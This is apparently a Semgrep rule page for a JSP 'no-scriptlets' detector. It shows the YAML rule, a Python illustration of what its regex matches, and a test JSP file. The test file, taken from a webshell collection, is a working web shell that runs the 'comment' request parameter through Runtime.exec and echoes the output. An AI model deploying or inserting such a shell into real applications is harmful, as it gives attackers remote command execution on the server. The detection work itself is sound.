java.lang.security.audit.xss.jsp.no-scriptlets.no-scriptlets

Author: semgrep
Download count: 6,309

JSP scriptlet detected. Scriptlets are difficult to use securely and are considered bad practice. See https://stackoverflow.com/a/3180202. Instead, consider migrating to JSF or using the Expression Language '${...}' with the escapeXml function in your JSP files.

Definition

rules:
  - id: no-scriptlets
    message: JSP scriptlet detected. Scriptlets are difficult to use securely and
      are considered bad practice. See https://stackoverflow.com/a/3180202.
      Instead, consider migrating to JSF or using the Expression Language
      '${...}' with the escapeXml function in your JSP files.
    metadata:
      owasp:
        - A03:2021 - Injection
      cwe:
        - "CWE-116: Improper Encoding or Escaping of Output"
      references:
        - https://stackoverflow.com/a/3180202
        - https://stackoverflow.com/a/4948856
      category: security
      technology:
        - jsp
      subcategory:
        - audit
      likelihood: LOW
      impact: LOW
      confidence: LOW
      license: Commons Clause License Condition v1.0[LGPL-2.1-only]
      vulnerability_class:
        - Improper Encoding
    pattern-regex: \<\%[^\@].*
    paths:
      include:
        - "*.jsp"
    languages:
      - regex
    severity: WARNING
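The rule is a plain regex, so it is worth seeing exactly what `\<\%[^\@].*` flags and what it lets through. The following is an added example, not part of the Semgrep rule or its test file: it copies the rule's `pattern-regex` into Python's `re` module (standing in for Semgrep's regex engine, an assumption for this example), runs it over a constructed JSP snippet, and names the JSP construct behind each match. The snippet, the `find_scriptlets` and `classify` helpers, and the `fn` taglib prefix are this example's own.

```python
import re

# pattern-regex copied verbatim from the rule definition above.
# Reads as: a literal "<%", then one character that is not "@", then the
# rest of the line. The [^\@] excludes page/taglib directives such as
# <%@ page ... %>, which are not scriptlets.
SCRIPTLET_RE = re.compile(r"\<\%[^\@].*")

# Constructed JSP snippet (not from the rule's test file). It mixes the JSP
# constructs a reviewer meets in practice; only the last three lines are the
# kind of code the rule message is really warning about. The EL line shows
# the replacement the message recommends.
SAMPLE_JSP = """\
<%@ page import="java.util.*" %>
<%@ taglib prefix="fn" uri="http://java.sun.com/jsp/jstl/functions" %>
<%-- JSP comment: not rendered, not executed --%>
<%! int hits = 0; %>
<p>Hello, <%= request.getParameter("name") %></p>
<p>Hello, ${fn:escapeXml(param.name)}</p>
<%
    out.println(request.getParameter("comment"));
%>
"""


def find_scriptlets(jsp_source: str) -> list[tuple[int, str]]:
    """Run the rule's regex over a whole JSP file.

    Returns (1-based line number, matched text) per match, mirroring how a
    Semgrep finding would be reported. Python's ``re`` is used in place of
    Semgrep's regex engine (an assumption for this example).
    """
    hits = []
    for m in SCRIPTLET_RE.finditer(jsp_source):
        line_no = jsp_source.count("\n", 0, m.start()) + 1
        hits.append((line_no, m.group(0).rstrip("\n")))
    return hits


def classify(match_text: str) -> str:
    """Name the JSP construct behind a match, to show what the regex lumps together."""
    if match_text.startswith("<%--"):
        return "comment"
    if match_text.startswith("<%="):
        return "expression"
    if match_text.startswith("<%!"):
        return "declaration"
    return "scriptlet"


def main():
    for line_no, text in find_scriptlets(SAMPLE_JSP):
        print(f"line {line_no:>2} {classify(text):<11} {text}")


if __name__ == "__main__":
    main()
```

Running it reports lines 3, 4, 5 and 7 of the snippet: the two `<%@` directives are skipped as intended, and the `${fn:escapeXml(...)}` line is not touched. But the same regex also fires on a JSP comment (`<%--`), a declaration (`<%!`) and an expression (`<%=`), none of which is a scriptlet in the strict sense, which is why the rule carries LOW confidence and is filed under `audit`: treat each finding as a prompt to look at the block, not as a confirmed injection.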

Examples

no-scriptlets.jsp

<!-- cf. https://github.com/JoyChou93/webshell/blob/4a2f049afe009f9cc061357b002cff78c06d6c43/jsp/cmd.jsp -->
<!-- ok: no-scriptlets -->
<%@ page import="java.util.*,java.io.*"%>
<!-- ruleid: no-scriptlets -->
<% %>
<HTML><BODY> <FORM METHOD="GET" NAME="comments" ACTION="">
<INPUT TYPE="text" NAME="comment">
<INPUT TYPE="submit" VALUE="Send">
</FORM> <pre>
<!-- ruleid: no-scriptlets -->
<%
 if ( request.getParameter( "comment" ) != null )
 {
     out.println( "Command: " + request.getParameter( "comment" ) + "<BR>" );
     Process p        = Runtime.getRuntime().exec( request.getParameter( "comment" ) );
     OutputStream os    = p.getOutputStream();
     InputStream in        = p.getInputStream();
     DataInputStream dis    = new DataInputStream( in );
     String disr        = dis.readLine();
     while ( disr != null )
     {
         out.println( disr ); disr = dis.readLine();
     }
 }
%>
</pre>
</BODY></HTML>